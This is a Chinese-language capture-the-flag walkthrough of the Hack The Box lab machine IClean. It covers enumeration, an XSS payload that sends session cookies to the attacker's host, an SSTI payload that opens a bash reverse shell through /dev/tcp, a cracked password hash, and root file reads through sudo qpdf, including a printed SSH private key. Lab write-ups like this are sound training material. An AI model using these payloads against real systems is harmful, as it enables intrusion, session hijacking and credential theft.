HTB IClean

IClean (Linux · Medium)

SSTI + qpdf

枚举

nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
nmap -A -v -T4 10.10.11.12

Nmap scan report for capiclean.htb (10.10.11.12)
Host is up (0.28s latency).
Not shown: 976 closed tcp ports (conn-refused)
PORT      STATE    SERVICE          VERSION
22/tcp    open     ssh              OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 2c:f9:07:77:e3:f1:3a:36:db:f2:3b:94:e3:b7:cf:b2 (ECDSA)
|_  256 4a:91:9f:f2:74:c0:41:81:52:4d:f1:ff:2d:01:78:6b (ED25519)
80/tcp    open     http             Apache httpd 2.4.52 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: 59A6DBEA095D69E461CAC2D85CE6999A
| http-methods: 
|_  Supported Methods: HEAD OPTIONS GET
|_http-title: Capiclean
| http-server-header: 
|   Apache/2.4.52 (Ubuntu)
|_  Werkzeug/2.3.7 Python/3.10.12
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

访问10.10.11.12,重定向到capiclean.htb,添加hosts

1
echo "10.10.11.12 capiclean.htb" | sudo tee -a /etc/hosts

gobuster

1
2
gobuster vhost -u http://capiclean.htb/ --append-domain -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt
Nothing

dirsearch

1
2
3
4
dirsearch -u capiclean.htb
/login
/quote
/dashboard	302

capiclean.htb/quote

image-20240730143554120

抓包,发现请求路径变成了/sendMessage

image-20240730143751635

对其参数进行测试,最终测试XSS成功

1
2
3
4
5
6
7
8
9
<img src=x onerror=fetch("http://10.10.16.38:8000/"+document.cookie);>

# urlencode
service=<img+src%3dx+onerror%3dfetch("http%3a//10.10.16.38:8000/"%2bdocument.cookie)%3b>

# payload
<img+src%3dx+onerror%3dfetch("http%3a//10.10.16.38:8000/"%2bdocument.cookie)%3b>&email=aaaaaa%40aa.a

python3 -m http.server

接受到

1
session=eyJyb2xlIjoiMjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzMifQ.ZqfzSw.KpFwmEyKO76EyEMzWmsW-mWq_XA

添加Cookie,访问/dashboard

image-20240730145735557

/InvoiceGenerator,输入参数后会生成一个Invoice ID generated,对其参数进行测试无果

image-20240730150118705

/QRGenerator,输入Generate QR后会出现下面的输入框,都对其进行测试

image-20240731144418899

Shell

qr_link进行测是发现SSTI

image-20240731144600755

payload:

1
{{request|attr("application")|attr("\x5f\x5fglobals\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fbuiltins\x5f\x5f")|attr("\x5f\x5fgetitem\x5f\x5f")("\x5f\x5fimport\x5f\x5f")("os")|attr("popen")("bash+-c+'/bin/bash+-i+>%26+/dev/tcp/10.10.16.38/4444+0>%261'")|attr("read")()}}

app.py,拿到数据库凭据

1
iclean:pxCsmnGLckUb

image-20240731152220685

不是交互式也可以用 -e参数

1
mysql -uiclean -ppxCsmnGLckUb -e 'show databases;'

查有bash权限的用户

image-20240731153010697

hash-identifier

image-20240731152312028

hashcat

1
2
3
hashcat -m 1400 -a 0 0a298fdd4d546844ae940357b631e40bf2a7847932f82c494daa1c9c5d6927aa  /usr/share/wordlists/rockyou.txt

0a298fdd4d546844ae940357b631e40bf2a7847932f82c494daa1c9c5d6927aa:simple and clean

ssh就可以连了

权限提升

image-20240731154158501

https://qpdf.readthedocs.io/en/stable/cli.htm

读flag

1
2
3
sudo /usr/bin/qpdf --empty /tmp/root.txt --qdf --add-attachment /root/root.txt --

cat /tmp/root.txt

也可以连root

1
sudo /usr/bin/qpdf --empty /tmp/rsa.txt --qdf --add-attachment /root/.ssh/id_rsa --

写入文件 id_rsa

1
2
3
4
5
6
7
8
9
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAaAAAABNlY2RzYS
1zaGEyLW5pc3RwMjU2AAAACG5pc3RwMjU2AAAAQQQMb6Wn/o1SBLJUpiVfUaxWHAE64hBN
vX1ZjgJ9wc9nfjEqFS+jAtTyEljTqB+DjJLtRfP4N40SdoZ9yvekRQDRAAAAqGOKt0ljir
dJAAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBAxvpaf+jVIEslSm
JV9RrFYcATriEE29fVmOAn3Bz2d+MSoVL6MC1PISWNOoH4OMku1F8/g3jRJ2hn3K96RFAN
EAAAAgK2QvEb+leR18iSesuyvCZCW1mI+YDL7sqwb+XMiIE/4AAAALcm9vdEBpY2xlYW4B
AgMEBQ==
-----END OPENSSH PRIVATE KEY-----

设置权限并连接

1
2
chmod 600 id_rsa
ssh -i id_rsa root@10.10.11.12
⬆︎TOP